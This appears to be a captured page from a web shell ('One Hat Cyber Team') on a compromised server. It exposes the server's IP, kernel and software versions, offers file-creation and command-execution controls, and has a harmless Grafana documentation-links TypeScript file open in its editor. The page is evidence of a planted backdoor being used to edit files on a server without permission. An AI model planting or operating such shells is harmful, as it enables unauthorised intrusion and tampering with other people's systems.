⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.4
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
grafana
/
public
/
app
/
core
/
utils
/
Edit File: docsLinks.ts
import { DocsId } from '@grafana/data'; // TODO: Documentation links const DOCS_LINKS: Record<DocsId, string> = { [DocsId.Transformations]: 'https://grafana.com/docs/grafana/latest/panels/transformations', [DocsId.FieldConfig]: 'https://grafana.com/docs/grafana/latest/panels/field-configuration-options/', [DocsId.FieldConfigOverrides]: 'https://grafana.com/docs/grafana/latest/panels/field-configuration-options/#override-a-field', }; export const getDocsLink = (id: DocsId) => DOCS_LINKS[id];
Simpan